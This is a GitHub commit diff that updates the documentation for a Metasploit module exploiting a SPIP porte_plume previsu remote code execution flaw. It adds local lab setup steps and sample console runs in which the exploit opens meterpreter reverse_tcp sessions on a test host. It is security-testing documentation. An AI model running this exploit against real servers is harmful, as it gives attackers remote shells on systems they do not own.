Skip to content

Commit c7d2085

Browse files
committed
Update documentation
1 parent eaf5661 commit c7d2085

File tree

1 file changed

+31
-15
lines changed

1 file changed

+31
-15
lines changed

documentation/modules/exploit/multi/http/spip_porte_plume_previsu_rce.md

Lines changed: 31 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -53,6 +53,19 @@ networks:
5353
driver: bridge
5454
```
5555
56+
### Non-Docker Setup
57+
58+
If you prefer not to use Docker, you can manually set up SPIP with the following commands:
59+
60+
```bash
61+
wget https://files.spip.net/spip/archives/spip-v4.2.12.zip
62+
unzip spip-v4.2.12.zip
63+
cd spip-v4.2.12
64+
php -S 0.0.0.0:8000
65+
```
66+
67+
Accessible at `http://localhost:8000`.
68+
5669
## Verification Steps
5770

5871
1. Set up a SPIP instance with the specified Docker environment.
@@ -95,40 +108,43 @@ exploit
95108
With `php/meterpreter/reverse_tcp`:
96109

97110
```
98-
msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8880 AutoCheck=false
111+
msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8000
99112
100113
[*] Started reverse TCP handler on 192.168.1.36:4444
101-
[!] AutoCheck is disabled, proceeding with exploitation
114+
[*] Running automatic check ("set AutoCheck false" to disable)
115+
[*] SPIP Version detected: 4.2.12
116+
[+] The target appears to be vulnerable. The detected SPIP version (4.2.12) is vulnerable.
117+
[*] Preparing to send exploit payload to the target...
102118
[*] Sending exploit payload to the target...
103-
[*] Sending stage (39927 bytes) to 172.23.0.3
104-
[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.23.0.3:35902) at 2024-08-10 21:56:50 +0200
119+
[*] Sending stage (39927 bytes) to 192.168.1.36
120+
[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.36:56534) at 2024-08-19 19:43:18 +0200
105121
106-
meterpreter > sysinfo
107-
Computer : 5d309f4bdfbe
108-
OS : Linux 5d309f4bdfbe 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
122+
meterpreter > sysinfo
123+
Computer : linux
124+
OS : Linux linux 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
109125
Meterpreter : php/linux
110-
meterpreter >
111126
```
112127

113128
With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
114129

115130
```
116-
msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8880 AutoCheck=false
131+
msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8000
117132
118133
[*] Started reverse TCP handler on 192.168.1.36:4444
119-
[!] AutoCheck is disabled, proceeding with exploitation
134+
[*] Running automatic check ("set AutoCheck false" to disable)
135+
[*] SPIP Version detected: 4.2.12
136+
[+] The target appears to be vulnerable. The detected SPIP version (4.2.12) is vulnerable.
120137
[*] Preparing to send exploit payload to the target...
121138
[*] Sending exploit payload to the target...
122-
[*] Sending stage (3045380 bytes) to 172.23.0.3
123-
[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.23.0.3:38992) at 2024-08-10 22:10:19 +0200
139+
[*] Sending stage (3045380 bytes) to 192.168.1.36
140+
[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 192.168.1.36:59106) at 2024-08-19 19:44:40 +0200
124141
125142
meterpreter > sysinfo
126-
Computer : 172.23.0.3
127-
OS : Debian 11.9 (Linux 5.15.0-113-generic)
143+
Computer : 192.168.1.36
144+
OS : LinuxMint 21.3 (Linux 5.15.0-113-generic)
128145
Architecture : x64
129146
BuildTuple : x86_64-linux-musl
130147
Meterpreter : x64/linux
131-
meterpreter >
132148
```
133149

134150
- The module successfully exploits the vulnerability and opens a Meterpreter session on the target.

0 commit comments

Comments
 (0)